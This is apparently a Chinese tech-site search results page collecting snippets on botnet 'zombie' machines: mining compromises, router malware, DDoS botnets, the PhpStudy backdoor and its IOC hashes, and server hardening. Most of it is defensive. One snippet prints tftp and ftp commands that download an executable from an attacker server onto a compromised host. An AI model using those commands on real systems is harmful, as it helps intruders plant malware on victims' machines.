首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

记一次服务器肉鸡挖矿的经历

1查看CPU占用 Top 命令看了一下,有 1个 99% 的同名进程还在运行 看样子像是服务器挂马了,首先应该检查服务器是否有可疑的定时任务。...经过一番搜索,确定是服务器当做“肉鸡”,挖矿了 3“肉鸡” 此肉鸡非彼肉鸡。 电脑肉鸡是一种病毒。感染此病毒的电脑会受别人控制。...说到肉鸡,就要讲到远程控制。远程控制软件例如灰鸽子、上兴等。 肉鸡不是吃的那种,是中了木马,或者留了后门,可以远程操控的机器,许多人把有WEBSHELL权限的机器也叫肉鸡。...谁都不希望自己的电脑被他人远程控制,但是很多人的电脑是几乎不设防的,很容易远程攻击者完全控制。 4控制肉鸡能干什么 看不惯哪个网站?...所以各位小伙伴一定要,加强各个组件的安全加固,防止入侵。做好安全防护,提高信息安全意识。 ---END---

3.6K20
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    用户端设备ONU肉鸡攻击实例浅析

    本案例主要分析终端设备ONU通过某端口植入恶意程序,导致上网感知慢、测速不达标、强推广告等的异常上网现象。通过网络报文和设备log打印信息帮助定位故障是目前ONU排查问题的重要手段。...实地现常挂测问题ONU设备,抓取到入侵过程报文,发现有异常的智能客户端交互数据,这也是用户电脑强制弹出广告的原因。...2.2 入侵后的后台程序行为分析 ONU入侵后,原先正常的程序ftp、samba、mobileapp关闭,然后植入了init_mon、protect、ssk三个后台程序。...故障ONU启动时向国外的DNS服务器请求地址: ? ONU访问github下载并执行恶意程序,从而完全控制,成为肉鸡,对黑客是美味至极,对自己却是后患无穷。 ?...本例中就是通过打印信息和网络报文发现ONU内部木马进程以及网络协议异常,从而发现用户ONU恶意程序侵入成为肉鸡,导致出现上网异常现象。细思俱恐,网络安全就是国家安全,网络安全为人民。网络安全靠人民!

    1.5K10

    300万电动牙刷肉鸡拿去DDOS攻击!

    集中发起请求:当攻击者决定发起DDoS攻击时,会指令这些受控设备在同一时间向目标网站或服务器发送海量请求。...资源耗尽:短时间内涌入的巨大流量超出目标服务器或网络的处理能力,导致其CPU、内存、带宽等资源耗尽。...物联网设备当做肉鸡的情况会越来越多随着越来越多的智能家居的投入使用,例如前段时间小米SU7上配备了小爱同学,联网车载智能系统,如果这些系统被黑客入侵,那真的可能当成肉鸡使用!...想一想,工作里要处理服务器ddos问题,结果拿去ddos的还是平时可能用到的智能设备,真是没有任何隐私可言!...尽管此次事件并非真实,但仍然警示企业要注意保护所有暴露在互联网上的设备,包括但不限于路由器、服务器、物联网设备等,确保及时安装安全更新并设置强密码,以防招募至DDoS僵尸网络中。

    12610

    浏览网页变挖矿肉鸡

    、用户资产等,扩大到了用户设备的CPU资源上,也就是说,用户浏览网页都可能变成被黑客攻击变为加密货币挖矿的肉鸡。...因此,传统攻击不仅难度大而且防御系统完善,发展挖矿的肉鸡能够给黑客们带来更可观的利润。...这些网站为了有目的的增加收入,会暂时性的安装挖矿程序以获取利润;但加密货币的开采性质往往需要插件在后台长时间的运行,因此黑客们不得不铤而走险,为获得利益最大化,黑客们寻找流媒体站点和一些公共网站开始下手,甚至在很多情况下网站植入了挖矿代码后...但挖矿脚本瞄准的是所有的互联网端口,无论是PC还是智能移动设备,只要产品有CPU就可以攻击。黑客不挑食的结果就是攻击覆盖面急速上升。 由于挖矿脚本并不是病毒,一些安全软件甚至会无法察觉到此类攻击。...诚然,安全软的安装一定会占用用户的部分资源,而且会拖慢电脑的运行速度,但是至少这部分的拖慢是可见而且可控的,而一旦入侵或者攻击后,设备的控制权都会被攻击者夺去,真的会得不偿失。

    1.7K70

    数十万PhpStudy用户植入后门,快来检测你是否已沦为“肉鸡”!

    案情破获:自2016年开始潜伏,累计67万电脑沦为“肉鸡” PhpStudy软件对于国内众多开发者而言,并不陌生。...从2016年起,黑客利用该“后门”犯罪作恶一发不可收拾,大量中招的电脑沦为“肉鸡”执行危险命令,不计其数的用户账号密码、电脑数据、敏感信息远程抓取和回传。...值得注意的是,经360安全大脑的监测发现,篡改的软件版本并不单单是官方通告的PhpStudy2016版本中的Php5.4版本,而是在PhpStudy 2016版和2018版两个版本中均同时被发现有“后门...请及时修改服务器密码,其他使用相同注册邮箱和密码的网络帐户也应该一并修改,消除风险; 3....附录:部分IOCs 篡改的php_xmlrpc.dll: c339482fd2b233fb0a555b629c0ea5d5 0f7ad38e7a9857523dfbce4bce43a9e9 8c9e30239ec3784bb26e58e8f4211ed0

    1.4K40

    黑客口中的肉鸡是什么?

    今天我们来聊一聊计算机领域中的肉鸡这么个玩意。首先肉鸡是什么呢?在计算机领域中,肉鸡又被称为傀儡机,他是指被黑客成功入侵并受操控的主机。...肉鸡是黑帽子黑客的致富来源,经常被拿来像白菜一样售卖,价格几分钱到几十块钱一个不等。接下来我们主要看一下肉鸡有什么危害,黑客拿肉鸡有什么用呢?...首先黑客可以控制肉鸡的所有行为,包括鼠标,磁盘,摄像头等,这对称为肉鸡的用户来说是很可怕的事情,这样用户是没有任何隐私的,听起来很遥远,但是他就在我们身边。...“盗号”其实就是最常见的一个体现,不止游戏账号很危险,包括游戏里面各种装备,除开游戏,你的QQ账号也很危险,包括QQ里面的虚拟货币等财产。...利用网速快,性能好的肉鸡作为代理服务器,充当跳板,替罪羊,经过多次代理跳转攻击,从而隐蔽自己;其次就是发起DDoS攻击,攻击者通过控制大量肉鸡,发起大量流量淹没目标服务器或其周边的基础设施,破坏目标服务器

    1.2K20

    黑客入侵大量“肉鸡”后用来干嘛?

    肉肉今天来讲讲黑客入侵“肉鸡”后用来干嘛?好多人看到“肉鸡”会不知道是什么??? “肉鸡”也称傀儡机,是指可以被黑客远程控制的机器。...比如用"灰鸽子"等诱导客户点击或者电脑被黑客攻破或用户电脑有漏洞种植了木马,黑客可以随意操纵它并利用它做任何事情。...6.以“肉鸡”电脑为跳板(代理服务器)对其它电脑入侵 黑客的任何攻击行为都可能留下痕迹,为了更好的躲藏自己,必然要经过多次代理的跳转,肉鸡电脑充当了中介和替罪羊。...网速快,机器性能好的电脑用作代理服务器的可能性更大。 7....总之在黑客的世界里,”肉鸡“电脑就像白菜一样卖来卖去。有的人却傻傻的不知道,所以即使你不是it界的人员,你也应该提高自己的安全意识! 肉肉就说到这儿了,想关注更多的可以来我们公众号。

    4.6K40

    如何防止自己的电脑成为肉鸡

    huyuyang6688/article/details/9385885 随着越来越多的人开始接触互联网,由于一些网民在上网过程中的疏忽,导致自己的计算机被黑客植入木马病毒,成为他们手中的“肉鸡...肉鸡是指被黑客攻破并植入木马病毒的机器,由于植入了病毒,因此黑客们可以随意操纵它并利用它做任何事情,相当于操纵者们可以远程控制“肉鸡”即被侵机器甚至有了侵机器的管理员权限。        ...当机器成为肉鸡后,入侵者可以盗取个人信息,盗取机主的Q币、游戏账号等虚拟财产,甚至还可能盗取个人网银账户密码等真实财产。        ...所以,为了避免自己成为别人手中的肉鸡,任人宰割,应该注意以下几点:     1、删掉不必要的协议   对于服务器和主机来说,一般只安装TCP/IP协议就够了。...4.禁止建立空连接   在默认的情况下,任何用户都可以通过空连接连上服务器,枚举账号并猜测密码。因此,我们必须禁止建立空连接。

    2.5K30

    肉鸡的几种方法

    扫描完成后会找点工具就OK了端口抓肉鸡的几种方法 肉鸡大家都应该清楚是什么东西吧!...几种肉鸡上传文件的方法 tftp法 先在自己某机器上建个tftp服务器,如执行tftpd32.exe, 再将文件(sample.exe)上传到别的机器中(肉鸡), 肉鸡cmd中执行:tftp-i服务器ipgetsample.exe...ftp法 肉鸡cmd中执行: echoopenftp服务器ip[端口]>ftp.txt echousername>>ftp.txt echopassword>>ftp.txt echogetsample.exe...几种肉鸡上传文件的方法 tftp法 先在自己某机器上建个tftp服务器,如执行tftpd32.exe, 再将文件(sample.exe)上传到别的机器中(肉鸡), 肉鸡cmd中执行:tftp-i服务器ipgetsample.exe...ftp法 肉鸡cmd中执行: echoopenftp服务器ip[端口]>ftp.txt echousername>>ftp.txt echopassword>>ftp.txt echogetsample.exe

    3.3K10

    WordPress流氓主题利用户服务器肉鸡发动DDos攻击

    交换这些链接可以提高对pipdig的SEO好处,并且绝大多数博客都不会注意到切换器(特别是如果页面/帖子编辑,blogerize的链接将像正常一样出现在后端)。...3.这可能很容易恶意手段劫持。 4.密码就是明文; 我可以监控socialz.txt文件以获得响应,并通过一些谷歌搜索轻松找到相应的博客到电子邮件地址并使用不安全的密码获取访问权限。...hello-dolly/hello.php', 'theme-test-drive/themedrive.php', ); deactivate_plugins($plugins); 再往下,另一堆停用...当代码的第二行反混淆并且可读时,可以得到以下内容: ? Deobfuscated contents of line 2 of zeplin1.js....然而,最近报道的竞争对手的域名添加的最近时间表明Pipdig 即使在被曝光后仍然存在可疑行为 。 3月13日,存在可疑的DDoS代码。

    1.1K20

    服务器攻击分析?

    服务器一直在裸奔,三年多来也一直没有啥问题,直到最近发现访问非常缓慢,一开始我们也没有在意,因为所处的机房,近些日子线路问题不断,以为是线路问题,直到机房通知服务器攻击了,由于已经影响到了其他机子...最终,开了个会分析了下,最终分析如下: 攻击分两种: 是攻击 是当做肉鸡了 那么按照现在还能偶尔连上,还能偶尔操作下,而且程序都正常。估计是当做肉鸡了。因为如果是攻击了。...但是可能就找不到攻击的原因了。 先找出攻击的原因,解决攻击源,当然,这样肯定是能够解决问题的。 讨论过后,发现,第二点,难度太大,主要原因是服务器基本连不上。...直到网上查到这个文章:Linux服务器中木马(肉鸡)手工清除方法 才知道我们这么查询都是徒劳的,这些系统程序都被替换了。。...使用netstat命令,或者抓包,都找不到木马所在,还好,状况如文章Linux服务器中木马(肉鸡)手工清除方法说的情况几乎一模一样。按照上面的操作,对服务器进行了清理,服务器就基本正常了。

    4K30

    解密 | 方程式组织如何控制“肉鸡

    DanderSpritz是成功入侵渗透后管理的平台,简单讲就是用来管理入侵成功后的受控机器,也就是俗称的“肉鸡”。 启动界面看起来很霸气: ?...在控制台输入help命令,可以看到能对肉鸡执行众多功能强大的管理命令: ? 其中eventlogclear、eventlogedit命令可以完全清除系统安全日志。...根据安恒安全研究院在Windows Server 2008 R2版本上的测试,上述命令可以删除单条日志,这意味着系统管理员可能完全无法觉察系统已经入侵。...最主要的是内置了25种Payload,用于生成跟肉鸡建立连接的后门和代理功能模块: ?...而且手握0day,植入后门并不需要考虑持久化,因为即使机器重启丢失后门连接,攻击者利用这些0day沿着之前入侵的套路重新控制肉鸡并非难事。

    1.3K61

    服务器攻击怎么处理

    很多客户网站服务器入侵,攻击,找到我们SINE安全公司寻求技术支持与帮助,有些网站篡改,跳转,首页内容替换,服务器植入木马后门,服务器卡顿,服务器异常网络连接,有的客户使用的是阿里云服务器,经常被提醒服务器有挖矿程序...,安全的处理时间也需要尽快的处理,根据我们的处理经验,我们总结了一些服务器攻击,被黑的排查办法,专门用来检查服务器第一时间的安全问题,看发生在哪里,服务器是否被黑,是否攻击,那些篡改等等。...如何排查服务器攻击?...在我们处理客户服务器攻击的时候发现很多服务器的命令篡改,比如正常的PS查看进程的,查询目录的 cd的命令都给篡改了,让服务器无法正常使用命令,检查服务器安全造成了困扰。...对服务器的启动项进行检查,有些服务器植入木马后门,即使重启服务器也还是攻击,木马会自动的启动,检查linux的init.d的文件夹里是否有多余的启动文件,也可以检查时间,来判断启动项是否有问题。

    9.8K20

    服务器入侵的教训

    今天一台服务器突然停了,因为是阿里云的服务器,赶紧去阿里云查看,发现原因是阿里云监测到这台服务器不断向其他服务器发起攻击,便把这台服务器封掉了 明显是入侵做为肉鸡了 处理过程 (1)查看登陆的用户...可以看到是设置ssh免密码登陆了,漏洞就是redis 检查redis的配置文件,密码很弱,并且没有设置bind,修改,重启redis 删除定时任务文件中的那些内容,重启定时服务 (6)把阿里云中云盾的监控通知项全部选中...(7)配置iptables,严格限制各个端口 总结教训 根本原因就是安全意识薄弱,平时过多关注了公司产品层面,忽略了安全基础 从上面的处理过程可以看到,没有复杂的东西,都是很基本的处理方式 对服务器的安全配置不重视...、阿里云已有的安全设置没有做、阿里云的安全监控通知没有重视 网络安全是很深奥的,但如果提高安全意识,花点心思把安全基础做好,肯定可以避免绝大部分的安全事故 这个教训分享给向我一样系统安全意识不高的服务器管理者

    2.3K70

    如何发现服务器入侵了,服务器入侵了该如何处理?

    作为现代社会的重要基础设施之一,服务器的安全性备受关注。服务器侵入可能导致严重的数据泄露、系统瘫痪等问题,因此及时排查服务器是否侵入,成为了保障信息安全的重要环节。...小德将给大家介绍服务器是否侵入的排查方案,并采取相应措施进行防护。第一步:日志分析服务器日志是排查服务器是否侵入的重要依据之一。通过分析服务器日志,我们可以查看是否有异常的登录记录、访问记录等。...例如,如果发现大量的未知IP地址在尝试连接服务器,或者发现服务器发送了大量的数据包到外部网络,那么可能存在服务器攻击的风险。...第五步:定期备份和恢复无论我们采取了多么严密的安全措施,服务器攻击的风险始终存在。因此,定期备份服务器数据并建立恢复机制是非常重要的。...上诉是小德总结出来还未被攻击的情况下,因为做的安全准备,下面小德再给大家介绍一下已经入侵情况下,该做的处理1、服务器保护核实机器入侵后,应当尽快将机器保护起来,避免二次入侵或者当成跳板扩大攻击面。

    77010
    领券